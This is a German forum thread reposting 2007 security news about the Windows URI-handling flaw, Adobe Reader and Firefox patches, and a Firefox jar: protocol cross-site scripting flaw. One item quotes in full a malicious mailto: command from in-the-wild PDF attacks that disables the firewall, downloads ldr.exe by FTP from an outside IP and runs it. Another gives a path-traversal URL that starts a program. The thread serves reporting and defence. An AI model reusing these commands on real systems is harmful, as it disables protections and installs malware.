Thema: Firefox ...

[SiLæncer]

Über zwei Monate sind vergangen, seit dem die kritische URI-Lücke in Windows bekannt wurde – Microsoft hat aber bislang immer noch keinen Patch bereitgestellt. Immer mehr Anwender greifen daher zur Selbsthilfe und versuchen ihre Systeme mit diversen Workarounds abzudichten. Das seltsame Verhalten von Windows XP mit installiertem Internet Explorer 7 kann dazu führen, dass das Öffnen einer Datei in einer Anwendung den Rechner mit Schad-Software infiziert. Die Entwickler von Firefox und Skype haben Vorkehrungen getroffen, dies zu verhindern, andere wie Adobe Reader, Outlook Express/2000, Miranda und mIRC sind nach wie vor anfällig.

Jetzt hat ein Hacker mit dem Pseudonym KJK::Hyperion sogar einen provisorischen und natürlich höchst inoffiziellen Patch veröffentlicht. Dieser klinkt sich in die Verarbeitung der anfälligen Windows-Funktion ShellExecute() ein und versucht, die Aufrufparameter vor der Bearbeitung durch Windows zu bereinigen. Doch selbst der Entwickler warnt: "Der aktuelle Patch ist nahezu ungetestet und wurde keinerlei Qualitätskontrolle unterzogen ..."

Es ist also nicht zu empfehlen, diesen Patch auf Produktionssystemen zu installieren. Immerhin stellt KJK::Hyperion seinen Workaround nicht nur als installationsfertige DLL-Bibliothek, sondern auch als Quelltext unter einer Open-Source-Lizenz zur Verfügung. Somit können andere diesen Code evaluieren und unter Umständen verbessern.

Wann Microsoft eine richtige Lösung für das Problem bereitstellt, steht nach wie vor in den Sternen. Über Monate hinweg hatten die Redmonder alle Nachfragen in diese Richtung abgewimmelt. Erst vor einer Woche, nachdem Secunia nachgewiesen hatte, dass auch Outlook Express/2000 als Einfallsvektor für Angriffe genutzt werden könnte, bestätigte Microsoft überhaupt die Existenz eines Problems in Windows XP. Der Fehler soll laut einem Blog-Eintrag des Microsoft Security Response Centers durch ein Update des Codes in ShellExecute() erfolgen. Doch der nächste reguläre Termin für ein solches Update wäre erst der Patchday Mitte November; und für ein Update außer der Reihe gibt es bislang keine Anzeichen.

http://spacebunny.xepher.net/hack/shellexecutefiasco/

Quelle : www.heise.de

[SiLæncer]

Der Autor des "nahezu ungetesteten", inoffiziellen Patches für das URI-Problem in Windows XP mit IE7 hat selbst einen gravierenden Fehler entdeckt. Es sei nach seinen eigenen Worten ein "grauenhaftes Speicherleck"; ein Fehler für den er sich eigentlich in die Ecke stellen müsste und schämen, meint KJK::Hyperion in seinem Beitrag auf einer Sicherheits-Mailingliste. Er stellt zwar auf seinen Seiten eine aktualiserte Fassung der Bibliothek bereit, aber auch deren Installation ist nicht zu empfehlen. Wann jedoch ein offizieller Patch von Microsoft erscheint, steht immer noch in den Sternen.

Quelle : www.heise.de

[SiLæncer]

Adobe hat wie angekündigt die Versionen 8.1.1 von Adobe Reader und Acrobat veröffentlicht, in denen der Umgang mit URIs beziehungsweise URLs in PDF-Dokumenten überarbeitet wurde. Durch das Öffnen manipulierter Dokumente ist es möglich, auf dem System installierte Anwendungen mit beliebigen Parametern zu starten. Ein Angreifer kann darüber die Kontrolle über einen Rechner erlangen, in dem ein Opfer etwa eine auf einem Webserver abgelegte oder per Mail erhaltene PDF-Datei öffnet. Dazu ist es nicht einmal nötig, dass der Anwender auf einen Link im Dokument klickt. Durch die Nutzung von ActionScript in PDF kann das Dokument bereits beim Laden die URL selbst aufrufen.

Ein Update für Adobe Reader 7.0.9 und Acrobat 7.0.9 soll zu einem späteren Zeitpunkt erscheinen. Anwender, die nicht auf die Versionen 8.1.1 wechseln können, empfiehlt Adobe, die Verarbeitung der mailto-URI in der Windows-Registry zu deaktivieren. Eine Anleitung dazu finden Betroffene in Adobes Fehlerbericht. Allerdings ist das Problem prinzipiell nicht auf mailto-URIs beschränkt, eine URL wie http:%xx../../../../../../../../../windows/system32/calc.exe".cmd kann den Taschenrechner ebenfalls starten.

Auch AOL hat nachgelegt und die Fassung 9.0.0.1 des Netscape-Webbrowsers freigegeben, in der neben zahlreichen anderen Lücke auch die URI-Problematik gelöst wurde. Damit ist der Netscape-Browser sicherheitsmäßig auf dem Stand der aktuellen Firefox-Version 2.0.0.8.

Von den bekannten verwundbaren Anwendungen bleibt bis dato nur der Instant Messenger Miranda verwundbar. Das für den November-Patchday geplante Update für Windows sollte allerdings auch dort und mit anderen Anwendungen das Problem entschärfen.

Quelle : www.heise.de

[SiLæncer]

Berichten auf der Sicherheitsmailingliste Full Disclosure zufolge gibt es bereits aktive Angriffe auf Anwender mittels präparierter PDF-Dokumente. Dabei enthalten die per E-Mail verschickten Dokumente eine URL, die versucht, über die bekannte URI-Lücke Befehle auf dem System auszuführen. Dabei soll es sich um folgende Befehlsfolge handeln:

mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"

Hier wird zunächst die Firewall unter Windows XP SP2 deaktiviert und per FTP die Datei ldr.exe nachgeladen und gestartet. Was dann im Weiteren geschieht, ist den Berichten nicht zu entnehmen. Es ist anzunehmen, dass sich ein Schädling auf dem System einnistet. Um Opfer eines Angriffs zu werden, ist es nicht zwingend erforderlich, einen Link im Dokument anzuklicken. Durch die Unterstützung von ActionScript, einer an JavaScript angelehnten Skriptsprache, kann das Dokument im Reader oder Acrobat die URL ohne Zutun des Anwenders aufrufen und somit die Befehlskette starten.

Die bösartigen PDF-Dateien sollen unter anderem Namen wie BILL.pdf, INVOICE.pdf und STATEMENT.pdf tragen, während als Betreffzeilen INVOICE alacrity, STATEMET indigene und INVOICE depredate gesichtet worden sind. Adobe stellt seit Anfang der Woche das Update 8.1.1 für den Adobe Reader und Acrobat zur Verfügung, in der das URI-Problem behoben ist. Anwender sollten so schnell wie möglich auf die aktuelle Version wechseln. Für diejenigen, denen aus bestimmten Gründen kein Update möglich ist, empfiehlt Adobe, in der Registry die Verknüpfung der mailto-URI mit Adobe-Produkten zu lösen. Ein Anleitung dazu findet sich hier: Update available for vulnerability in versions 8.1 and earlier of Adobe Reader and Acrobat.

Update
Derzeit ist die Windows-Version des Adobe Reader 8.1.1 noch nicht in deutsch verfügbar. Interressanterweise ist bereits für Linux ein RPM-Paket der deutschen Version 8.1.1 herunterladbar – allerdings kommt dort das URI-Problem gar nicht zum Tragen.

Quelle und Links : http://www.heise.de/newsticker/meldung/97866

[berti]

[...]
Hier wird zunächst die Firewall unter Windows XP SP2 deaktiviert und per FTP die Datei ldr.exe nachgeladen und gestartet.
[...] Durch die Unterstützung von ActionScript, einer an JavaScript angelehnten Skriptsprache, kann das Dokument im Reader oder Acrobat die URL ohne Zutun des Anwenders aufrufen und somit die Befehlskette starten.

Kleine verständnissfrage: wenn ich eine andere Firewall (kasper) benutze und die Java unterstützung im Adope-reader disable, bin ich dann gegen dieses problem gefeit ?

[SiLæncer]

Könnte klappen ...

btw. es gibt ja auch gute Alternativen zum Acrobat Reader

das z.B. : http://download.winboard.org/details.php?file=128

[berti]

Danke.

Werde das mal auf dem honeypot-rechner ausprobieren, sobald solche mail eintrifft.

ergebniss geb ich dann bekannt.

[Jürgen]

Der Foxit PDF Reader ist sicher noch kein vollwertiger Ersatz für den von Adobe, aber hier nutze ich den schon lange als Default-Anwendung.
Den anderen habe ich in's Send To Kontextmenü eingebaut.

Hinzu kommt, dass ich für's DSL-Modem (wie für jede andere Komponente auch) einen extra Netzschalter habe. Das läuft nur, wenn ich's für sinnvoll halte, den Rest der Zeit spare ich mir auch den Strom.

Browser-Plugins für PDF lehne ich ab.
Default wird nicht geöffnet sondern gespeichert.

Damit fällt Nachladen flach.

[berti]

foxit benutz ich z.teil auch, aber speziell bei arabisch & Persisch macht das teil ab und an probleme.
von daher leider adobe und die 8er version will ich mir nicht antun, die ruft mir zu oft nach hause an.

[SiLæncer]

Eine Schwachstelle in Firefox lässt sich für Cross-Site-Scripting-Attacken ausnutzen, durch die ein Angreifer etwa Anmeldeinformationen eines Opfers auf Webseiten wie MySpace und ähnlichen Angeboten abgreifen kann. Das Problem ist zwar bereits seit Anfang dieses Jahres bei den Firefox-Entwicklern bekannt und auch in einem Bugzilla-Eintrag dokumentiert, bislang hat man aber noch keine Änderung in Firefox vorgenommen, um es aus der Welt zu schaffen. Der Sicherheitsspezialist Petko Petkof ist nun offenbar abermals über den Fehler gestolpert und hat ihn in seinem Blog veröffentlich, sodass nun bereits das US-CERT einen Fehlerbericht dazu herausgegeben hat.

Die Schwachstelle beruht auf der Implementierung des von Sun spezifizierten jar-Protokolls, mit dem der Zugriff auf einzelne Dateien innerhalb eines Java-Archivs von einer Webseite möglich ist:
jar:http://www.foo.com/bar/baz.jar!/COM/foo/Quux.class
Dabei beschreibt http://www.foo.com/bar/baz.jar den Weg zum Archiv und !/COM/foo/Quux.class den Pfad zur Datei.

Da es sich bei dem Archiv nur um eine ZIP-Datei handelt und das Protokoll nicht nur auf Java-Dateien beschränkt ist, lassen sich auch andere Dateien auf diese Weise aufrufen:
jar:https://example.com/test.jar!/t.htm.
Dabei wird t.htm im Browser im Kontext von example.com dargestellt, was an sich nicht schlimm wäre, da das Dokument ja auch von dort stammt. Unglücklicherweise lassen sich damit aber etwa wie auf MySpace betriebene JavaScript-Filter austricksen, da diese nur die Inhalte der Seiten prüfen, nicht jedoch hochgeladene Dateien und Archive. Zudem funktioniert es ebenfalls, wenn man etwa test.zip in test.png umbenennt, um der Datei den Anschein eines Bildes zu geben. Der Trick funktioniert auch mit anderen Formaten, die im Wesentlichen nur ein komprimiertes Archiv darstellen, beispielsweise das Doc-Format unter OpenOffice.

Angreifer könnten mit einer präparierten URL etwa Eingaben auf anderen Seiten auslesen. Für einen erfolgreichen Angriff muss ein Phisher aber eine präparierte komprimierte Datei auf einem Server hinterlegen und sein Opfer dazu bringen, einen Link dorthin anzuklicken. Allerdings bleibt der mehr oder minder kryptische Link in der Adresszeile des Browser bei einem Angriff stehen.

Grundsätzlich hilft es, wie auch gegen die meisten anderen Cross-Site-Scripting-Angriffe, das Firefox-Modul NoScript eimzusetzen. Darüber hinaus empfiehlt das US-CERT Administratoren von Unternehmensnetzen, jar-URIs am Proxy oder der Firewall zu blockieren. Zudem können Betreiber von Webservern den Missbrauch ihrer Seiten verhindern, indem sie mit einem Reverse-Proxy URLs mit jar blockieren. Auch das Filtern der MIME-Typen, um die wirklich übertragenen Inhalte zu erkennen, soll helfen.

Siehe dazu auch:

    * Web Mayhem: Firefox’s JAR: Protocol issues, Bericht von pdp
    * Mozilla Firefox jar URI cross-site scripting vulnerability, Fehlerbericht des US-CERT
    * jar: protocol is an XSS hazard due to ignoring mime type and being considered same-origin with hosting site, Bugzilla-Eintrag von Mozilla.org

Quelle und Links : http://www.heise.de/security/news/meldung/98721/Cross-Site-Scripting-Luecke-in-Firefox

[SiLæncer]

Die kürzlich öffentlich bekannt gewordene Firefox-Schwachstelle in der Implementierung des jar-Protokolls weist offenbar noch mehr Potenzial für Missbrauch auf als vermutet. Die Lücke ermöglicht Angreifern, bestimmte Schutzvorkehrungen respektive Filter von Webseiten wie MySpace und anderen gegen Cross-Site-Scripting und aktive Inhalte auszutricksen, um Anwendern Login-Informationen abzuluchsen. Bislang ging man davon aus, dass es dafür möglich sein muss, ZIP- und andere Archive mit präparierten Inhalten auf dem vom Opfer besuchten Webserver zu zu speichern.

Nach Angaben der Entwickler soll der Angriff aber auch mit Redirects funktionieren, sodass ein präpariertes Archiv auf einem beliebigen Server liegen darf. Um das Archiv aufzurufen, genügt es, einfach den Redirect im HTML-Code einzubetten oder eine Seite wie Google-Mail zu nutzen, die Redirects unterstützt. Ein Demonstrationsexploit der Firefox-Entwickler führt das Problem für Google-Mail-Konten vorf. Im Test der heise-Security-Redaktion las er die gespeicherten Kontakte aus. Die Entwickler planen, das Problem in Firefox 2.0.0.10 zu lösen, indem der Browser prüft, ob der MIME-Type des Archivs korrekt ist. Version 2.0.0.10 unterliegt derzeit noch diversen Tests.

Quelle : www.heise.de

[SiLæncer]

Wie bereits vor einigen Tagen versprochen, haben die Mozilla-Entwickler ein neues Sicherheitsupdate für den Open-Source-Webbrowser Firefox vorgelegt. Die Version 2.0.0.10 schließt insgesamt drei Sicherheitslücken, die seit dem letzten Update bekannt wurden. Zu den Fehlern, die behoben wurden, gehört die Schwachstelle in der Implementierung des jar-Protokolls; dies ermöglichte Angreifern, bestimmte Schutzvorkehrungen respektive Filter von Webseiten wie MySpace und anderen gegen Cross-Site-Scripting und aktive Inhalte auszutricksen, um Anwendern Login-Informationen abzuluchsen.

Die Bedeutung aller Sicherheitslücken (neben dem jar-Problem ein Bug, der Referer-Spoofing ermöglichte, und Fehler, die möglicherweise über Abstürze zu Code-Einschleusung genutzt werden konnten) schätzt die Mozilla-Foundation als "Hoch" ein. Anwender von Firefox sollten so schnell wie möglich auf die neue Version updaten. Firefox 2.0.0.10 steht für Windows, Mac OS X und Linux in diversen Landessprachen, darunter Deutsch, zum Download bereit. Nach und nach wird die neue Version auch allen Anwendern über die automatische Update-Funktion des Browsers angeboten.

Quelle : www.heise.de

[SiLæncer]

Wenig Glück hat derzeit die Mozilla-Stiftung mit ihren neuen Firefox-Versionen. Die eben erst veröffentlichte Version 2.0.0.10, die drei Sicherheitslücken schließt, enthält einen neuen Fehler: Der Browser kann jetzt bestimmte Grafiken nicht mehr anzeigen.

Firefox 2.0.0.10 reagiert auf die JavaScript-Methode canvas.drawImage() mit der Ausnahme "NS_ERROR_NOT_AVAILABLE". Das Canvas-Objekt, ein seit Firefox 1.5 unterstützter Bestandteil von (X)HTML5, ermöglicht Vektorgrafiken per HTML und JavaScript; die jetzt fehlerhafte drawImage()-Methode zeichnet Pixelbilder in die Vektorgrafiken.

Schon die vorletzte Firefox-Version 2.0.0.8 hatte neben Sicherheits-Updates eine ganze Reihe von alten Fehler erneut in den Browser eingeschleust. Nach knapp zwei Wochen hatte Mozilla die Probleme beseitigt.

Quelle : www.heise.de

[SiLæncer]

Dem in dieser Woche veröffentlichten Firefox 2.0.0.10 wird bereits in Kürze die Version 2.0.0.11 folgen. Diese Version ist notwendig geworden, nachdem sich in Firefox 2.0.0.10 ein schwerer Bug eingeschlichen hatte, der bisher in keiner Firefox-Version existierte.

Derzeit scheinen die Firefox-Entwickler etwas vom Pech verfolgt zu sein: Nachdem erst in dieser Woche Firefox 2.0.0.10 erschienen war, soll bereits in Kürze Firefox 2.0.0.11 folgen - seit Mitte Oktober die vierte neue Version des Browsers.

Was ist geschehen: Bereits kurz nach Veröffentlichung von Firefox 2.0.0.10 gingen Klagen darüber ein, dass eine bisher tadellos arbeitende Funktion bei der neuen Firefox-Version nicht mehr funktionierte. „canvas.drawImage“ verweigert in Firefox 2.0.0.10 seine Dienste. Der Fehler ist in diesem Bugzilla-Eintrag dokumentiert.

Diese Website belegt den Fehler. Eigentlich sollte auf dieser Seite oben rechts ein Bild dargestellt werden. Ruft man die Fehler-Konsole von Firefox auf (unter Extras), wird eine Fehlermeldung angezeigt. Weitere Seiten, die aufgrund des Fehlers nicht mehr funktionieren, werden im Bugzilla-Eintrag aufgelistet. Getroffen hat es auch Online-Shops, die die besagte Funktion für die Darstellung von Grafiken nutzen und seither nicht mehr von Firefox-Nutzern genutzt werden können, nach dem sich bei diesen automatisch die neue Version 2.0.0.10 installiert hat.

Der Bug in Firefox 2.0.0.10 ist bereits behoben worden. Derzeit befinden sich Vorabfassungen von Firefox 2.0.0.11 im Test-Stadium. Die Release-Candidates von Firefox 2.0.0.11 in diversen Sprachen und für Windows, Linux und MacOS X sind in diesem FTP-Verzeichnis bei Mozilla abgelegt.
Die finale Version von 2.0.0.11 könnte noch im November erscheinen. Gemunkelt wird, dass es bereits am Freitag, den 30. November, so weit sein könnte.

Quelle : www.pcwelt.de

[Jürgen]

Die angekündigte Firefox-Version 2.0.0.11 ist jetzt verfügbar, auf Deutsch und auch bereits als Update, manuell wie automatisch.